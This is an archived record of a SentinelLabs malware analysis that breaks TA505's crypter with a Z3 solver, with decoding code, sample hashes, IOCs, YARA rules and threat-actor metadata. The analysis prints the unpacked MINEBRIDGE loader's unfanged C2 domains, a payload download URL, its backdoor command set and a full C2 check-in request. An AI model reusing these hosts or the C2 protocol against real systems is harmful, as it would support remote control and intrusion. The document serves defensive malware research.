{ "id": "2fb8ac31-12a1-4ec2-ad8c-41319b984328", "created_at": "2026-04-06T00:14:01.580006Z", "updated_at": "2026-04-10T03:36:37.141015Z", "deleted_at": null, "sha1_hash": "3efa159bd06a5774a1610636ac578752c8a26375", "title": "Breaking TA505's Crypter with an SMT Solver - SentinelLabs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 824335, "plain_text": "Breaking TA505's Crypter with an SMT Solver - SentinelLabs\r\nBy Jason Reaves\r\nPublished: 2020-03-04 · Archived: 2026-04-02 11:12:36 UTC\r\nUsing a satisfiability modulo theories (SMT)[8] solver to break the latest variant of the crypter being used on\r\nGet2.\r\nExecutive Summary\r\nTA505 has been leveraging the Get2 loader using the same crypter since at least September 2019.\r\nCrypter overlap found leveraged by actors involved in Clop/CryptoMix ransomware.\r\nCrypter overlap found leveraged by actors involved with MINEBRIDGE reported by FireEye to also be\r\nused by TA505.\r\nCrypter overlap work shows more links of TA505 leveraging Clop/CryptoMix and MINEBRIDGE.\r\nBackground\r\nTA505 [3] has been pushing their Get2 loader DLLs for a long time now using the same tactic [4], during this time\r\nthe crypter has remained the same with a few modifications every few months. This crypter is actually a prime\r\ncandidate for using SMT [1] to solve it and the latest iteration of the crypter gave me enough of a reason to write\r\nup a new unpacker utilizing SMT.\r\nResearch Insight\r\nThe crypter on the DLL has remained mostly static for the past 6 months with a few tweaks here and there. For\r\nexample, the XOR key for decoding the unpacked binary has moved around a bit; the latest version looking at the\r\n32-bit binary had the key referenced as an offset instead of having it placed in relation to the binary blob to be\r\ndecoded.\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 1 of 9\n\nFigure 1 Data and Key locations in recent sample\r\nThe decoding is actually done by an encoded blob of bytecode which is decoded in a similar manner to the crypted\r\nbinary.\r\nFigure 2 Decoding routine\r\nThe next layer that is decoded has remained pretty static over the months, it will reconstruct the binary data, run\r\nthe same decoding routine and finally APLib decompress the resulting blob giving us our unpacked Get2 loader.\r\nFigure 3 Shellcode decoding logic\r\nThe decoding is going to be:\r\nf(x) = rol(x^Δ, 4) + 2004318072\r\nWe also know the output for the first iteration being a compressed binary will be ‘M8Zx90’ so we can construct\r\nour problem in Z3[2] and let it solve what the XOR key should be.\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 2 of 9\n\ndef solve_ta505crypter(input, output):\r\n xorkey = BitVec('xor1', 32)\r\n s = Solver()\r\n s.add(rol(BitVecVal(struct.unpack_from('\u003cI',input)[0], 32) ^ xorkey, 4) + 2004318072 == BitVecVa\r\n return(s)\r\nAfter solving for the XOR key we just decode the data and write out the decompressed file.\r\n key = None\r\n for poss_decode in possible_decodes:\r\n s = solve_ta505crypter(t, poss_decode)\r\n if s.check() == sat:\r\n m = s.model()\r\n for d in m.decls():\r\n if d.name() == 'xor1':\r\n key = m[d].as_long()\r\n if key:\r\n out = \"\"\r\n for i in range(len(t)/4):\r\n temp = struct.unpack_from('\u003cI', t[i*4:])[0]\r\n temp ^= key\r\n temp = rol(temp, 4)\r\n temp += 2004318072\r\n out += struct.pack('\u003cI', temp \u0026 0xffffffff)\r\n \r\n open(sys.argv[1]+'_decodedObject', 'wb').write(out)\r\n if out[:3] == 'M8Z':\r\n print(\"Decompressing\")\r\n out2 = aplib.decompress(out).do()\r\n open(sys.argv[1]+'_decompressed', 'wb').write(out2[0])\r\nNow with a decoder, we can run it on the past few campaigns to harvest the IOCs. For example:\r\n\u003c..snip..\u003e\r\nf3196cb8288afe0c9e64778d9d82e4ad482153b916547809861f6d95677646fa\r\nDecompressing\r\nf66e03c26afac344b4e38345b26ce104f7131ed81e4f4961d43bd35df83493a5\r\nDecompressing\r\nf769549f2220a54ba738f0ff29c8d6917b9320fb6bc1445a821a990979f49c58\r\nDecompressing\r\nf775f6b32c8d54e44733d5dda34db81bd62e85f4e1df48500b6160403e482756\r\nDecompressing\r\n\u003c..snip..\u003e\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 3 of 9\n\nPivot\r\nAfter breaking apart a crypter that appears to only be used by a specific actor group we can pivot on that crypter to\r\nsee what else they might be using, such as this FlawedAmmy Loader that was mentioned on Twitter[5].\r\n4064ff7e06367b2431d371ddd1e97f659ec7f3c050229350725c91d6fffff835\r\nAnd another FlawedAmmy loader sample: \r\nad320839e01df160c5feb0e89131521719a65ab11c952f33e03d802ecee3f51f\r\nAlso an ‘av_block’ sample:  1c983566c27a154f319bf6f1681b1de91930f3b7c019560a0fbc52ead861bf90\r\nThis sample when unpacked shows to be designed to block protection services, after deobfuscating the strings\r\nwhich are obfuscated using a partial base64 and then eexec decoding.\r\nDeobfuscated strings involve a huge list of security products. This sample appears possibly related to Clop or\r\nCryptomix ransomware[6]. Some of the other strings in the binary we can also decode to get the process and files\r\nnames related to some common server processes such as SQL, ElasticSearch and Apache.\r\nAnother interesting sample found by pivoting on this packer is a custom loader designed to load TeamViewer\r\nwhich FireEye calls MINEBRIDGE[7] and list that is also used as a backdoor.\r\n244a272d25328c05361c106d74a126b57a779585b6c7f622f79019bb6838e982\r\nThis sample after unpacking has a custom UPX layer on it as well.\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 4 of 9\n\nFigure 4 Custom UPX layer\r\nAfter unpacking the sample fully we have a number of interesting strings.\r\nDomains:\r\nconversia91.top\r\nfatoftheland.top\r\ncreatorz123.top\r\n123faster.top\r\ncompilator333.top\r\nCommands\r\ndrun_command\r\ndrun_URL\r\nrundll_command\r\nrundll_URL\r\nupdate_command\r\nupdate_URL\r\nrestart_command\r\nterminate_command\r\nkill_command\r\npoweroff_command\r\nreboot_command\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 5 of 9\n\nsetinterval_command\r\nsetinterval_time\r\nC2 Related\r\nuuid=%s\u0026id=%s\u0026pass=%s\u0026username=%s\u0026pcname=%s\u0026osver=%s\u0026timeout=%d\r\n~f83g7bfiunwjsd1/g4t3_indata.php\r\nuuid=%s\u0026drun_status=1\r\nuuid=%s\u0026drun_status=2\r\nuuid=%s\u0026rundll_status=1\r\nuuid=%s\u0026rundll_status=2\r\nuuid=%s\u0026rundll_status=3\r\nuuid=%s\u0026update_status=1\r\nuuid=%s\u0026update_status=2\r\nuuid=%s\u0026restart_status=1\r\nuuid=%s\u0026terminate_status=1\r\nuuid=%s\u0026kill_status=1\r\nuuid=%s\u0026poweroff_status=1\r\nuuid=%s\u0026reboot_status=1\r\nuuid=%s\u0026setinterval_status=1\r\nAlso some hardcoded strings that seem interesting:\r\nTeamViewer\r\n~45feyf923h.bin\r\nhttps://conversia91.top/~files_tv/~all_files_m.bin\r\nWindows Defender\r\nCOM1_\r\nTeamViewer server\r\nTV_Marker\r\nCInfoWindow\r\nTVWidget\r\nWidegetAudioVoipPage\r\nTVScrollWin\r\nButton\r\nSoftwareTeamViewer\r\nTeamViewer\r\nDynGateInstanceMutex\r\n_GAZGOLDER_VASYA\r\n.log\r\n.txt\r\n.tmp\r\nThe loader performs a checkin to the C2 with a hardcoded User-Agent as well.\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 6 of 9\n\nPOST /~bv0j3irngskdn13/g4t3_indata.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like\r\nHost: compilator333.top\r\nContent-Length: 126\r\nCache-Control: no-cache\r\nuuid=9939DCDD-0E9E-754F-30950A0B\u0026id=.1221882482\u0026pass=p6dj76\u0026username=ZWYJukQ\u0026pcname=qIXONnRuFs\u0026osver=\r\nDownloading the all_files_m.bin gives us a ZIP compressed file full of TeamViewer software:\r\nDate Time Attr Size Compressed Name\r\n------------------- ----- ------------ ------------ ------------------------\r\n2018-09-17 05:17:10 ....A 27268760 11389396 TeamViewer.exe\r\n2017-01-05 08:10:34 ....A 130 90 TeamViewer.ini\r\n2018-09-17 05:17:10 ....A 7491824 2879243 TeamViewer_Desktop.exe\r\n2018-09-17 05:17:28 ....A 728816 150689 TeamViewer_Resource_en.dll\r\n2018-09-17 05:17:12 ....A 1445104 1210362 TeamViewer_StaticRes.dll\r\n------------------- ----- ------------ ------------ ————————————\r\nIndicators of Compromise\r\nSamples\r\ncf17190546eb876307bde25810973cdaa1bc739e3d85bcc977c858c305130eb4\r\n7420aafbceebd779fce23016e782e2223ed1e9f580e338bbd388beafe66dd10b\r\nURLs\r\n78d05d8a2c0604e115850977304b6a0b347492c9\r\nhxxps:\r\ne87e9041ea10ee08009c1ca1eaf756c8e053eb45\r\nhxxps:\r\n4d62018b98c0ea627c69c0d0463dd35da67a82a3\r\nhxxps:\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 7 of 9\n\n77d9df72ca8605652b6d804f3944ebc9b2451eac\r\nhxxps:\r\n74d8922f038219a270f75162d8b81d4b48870de7\r\nhxxps:\r\nf5e3db52f0de6d5de8c2bf12d47e45a19f2f112c\r\nhxxps:\r\nfe8c75d8c05101620d1eb8169dcfc40ae9d2932e\r\nhxxps:\r\nec3751f35cffae7a754fa68087d2c252d42a8815\r\nhxxps:\r\nf16d9e525e7ba66cff121e6aa1309d444676ec99\r\nhxxps:\r\n1802ad465d71e054ef0dff23ed608fe4813536af\r\nhxxps:\r\n7fbfaa047b28095b6a333cae56893583ed714bf0\r\nhxxps:\r\n47324f2342dc11eb124f5d44461ae2f8a408a8e5\r\nhxxps:\r\nc4d2a6ba297317ff6f070797cc119fd5e70b749e\r\nhxxps:\r\n5cb0d7ca31f58ec6c2f84d681759d311bc8ecd9e\r\nhxxps:\r\nYARA\r\nrule dll_packer_science_not_feelz\r\n{\r\nmeta:\r\nauthor=\"Jason Reaves\"\r\nstrings:\r\n$a1 = {c7 45 fc 00 00 00 00 8b 45 08 33 45 0c 89 45 08 c1 45 08 04 8b 4d 08 81 c1 78 77 77 77}\r\ncondition:\r\nall of them\r\n}\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 8 of 9\n\nrule dll_packer_science_not_feelz_2\r\n{\r\nmeta:\r\nsample=\"98cbaf55376e928b0c78fce3867d95b9ef4b45c1d91f103f00dad403dd524189\"\r\nthanks=\"Fowler\"\r\nauthor=\"Jason Reaves\"\r\nstrings:\r\n$a1 = {c7 45 fc 00 00 00 00 8b 45 08 33 45 0c 89 45 08 [0-20] c1 45 08 04 [0-14] 8b 4? 08 [1-2] 78 77\r\ncondition:\r\nall of them\r\n}\r\nReferences\r\n1: https://vixra.org/abs/2002.0183\r\n2: https://github.com/Z3Prover/z3\r\n3: https://attack.mitre.org/groups/G0092/\r\n4: https://blog.nviso.eu/2019/09/18/malicious-spreadsheet-dropping-a-dll/\r\n5: https://twitter.com/VK_Intel/status/1159277285834407936\r\n6: https://github.com/k-vitali/Malware-Misc-RE/blob/master/2019-08-03-cryptomix-clop-av_blockk-component.vk.notes.raw\r\n7: https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html\r\n8: https://en.wikipedia.org/wiki/Satisfiability_modulo_theories\r\nSource: https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nhttps://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/" ], "report_names": [ "breaking-ta505s-crypter-with-an-smt-solver" ], "threat_actors": [ { "id": "5e6b31a6-80e3-4e7d-8b0a-d94897ce9b59", "created_at": "2024-06-19T02:03:08.128175Z", "updated_at": "2026-04-10T02:00:03.636663Z", "deleted_at": null, "main_name": "GOLD TAHOE", "aliases": [ "Cl0P Group Identity", "FIN11 ", "GRACEFUL SPIDER ", "SectorJ04 ", "Spandex Tempest ", "TA505 " ], "source_name": "Secureworks:GOLD TAHOE", "tools": [ "Clop", "Cobalt Strike", "FlawedAmmy", "Get2", "GraceWire", "Malichus", "SDBbot", "ServHelper", "TrueBot" ], "source_id": "Secureworks", "reports": null }, { "id": "75d4d6a9-b5d1-4087-a7a0-e4a9587c45f4", "created_at": "2022-10-25T15:50:23.5188Z", "updated_at": "2026-04-10T02:00:05.26565Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "TA505", "Hive0065", "Spandex Tempest", "CHIMBORAZO" ], "source_name": "MITRE:TA505", "tools": [ "AdFind", "Azorult", "FlawedAmmyy", "Mimikatz", "Dridex", "TrickBot", "Get2", "FlawedGrace", "Cobalt Strike", "ServHelper", "Amadey", "SDBbot", "PowerSploit" ], "source_id": "MITRE", "reports": null }, { "id": "99cb4e5b-8071-4f9e-aa1d-45bfbb6197e3", "created_at": "2023-01-06T13:46:38.860754Z", "updated_at": "2026-04-10T02:00:03.125179Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "SectorJ04", "SectorJ04 Group", "ATK103", "GRACEFUL SPIDER", "GOLD TAHOE", "Dudear", "G0092", "Hive0065", "CHIMBORAZO", "Spandex Tempest" ], "source_name": "MISPGALAXY:TA505", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e447d393-c259-46e2-9932-19be2ba67149", "created_at": "2022-10-25T16:07:24.28282Z", "updated_at": "2026-04-10T02:00:04.921616Z", "deleted_at": null, "main_name": "TA505", "aliases": [ "ATK 103", "Chimborazo", "G0092", "Gold Evergreen", "Gold Tahoe", "Graceful Spider", "Hive0065", "Operation Tovar", "Operation Trident Breach", "SectorJ04", "Spandex Tempest", "TA505", "TEMP.Warlock" ], "source_name": "ETDA:TA505", "tools": [ "Amadey", "AmmyyRAT", "AndroMut", "Azer", "Bart", "Bugat v5", "CryptFile2", "CryptoLocker", "CryptoMix", "CryptoShield", "Dridex", "Dudear", "EmailStealer", "FRIENDSPEAK", "Fake Globe", "Fareit", "FlawedAmmyy", "FlawedGrace", "FlowerPippi", "GOZ", "GameOver Zeus", "GazGolder", "Gelup", "Get2", "GetandGo", "GlobeImposter", "Gorhax", "GraceWire", "Gussdoor", "Jaff", "Kasidet", "Kegotip", "Kneber", "LOLBAS", "LOLBins", "Living off the Land", "Locky", "MINEBRIDGE", "MINEBRIDGE RAT", "MirrorBlast", "Neutrino Bot", "Neutrino Exploit Kit", "P2P Zeus", "Peer-to-Peer Zeus", "Philadelphia", "Philadephia Ransom", "Pony Loader", "Rakhni", "ReflectiveGnome", "Remote Manipulator System", "RockLoader", "RuRAT", "SDBbot", "ServHelper", "Shifu", "Siplog", "TeslaGun", "TiniMet", "TinyMet", "Trojan.Zbot", "Wsnpoem", "Zbot", "Zeta", "ZeuS", "Zeus" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434441, "ts_updated_at": 1775792197, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3efa159bd06a5774a1610636ac578752c8a26375.pdf", "text": "https://archive.orkl.eu/3efa159bd06a5774a1610636ac578752c8a26375.txt", "img": "https://archive.orkl.eu/3efa159bd06a5774a1610636ac578752c8a26375.jpg" } }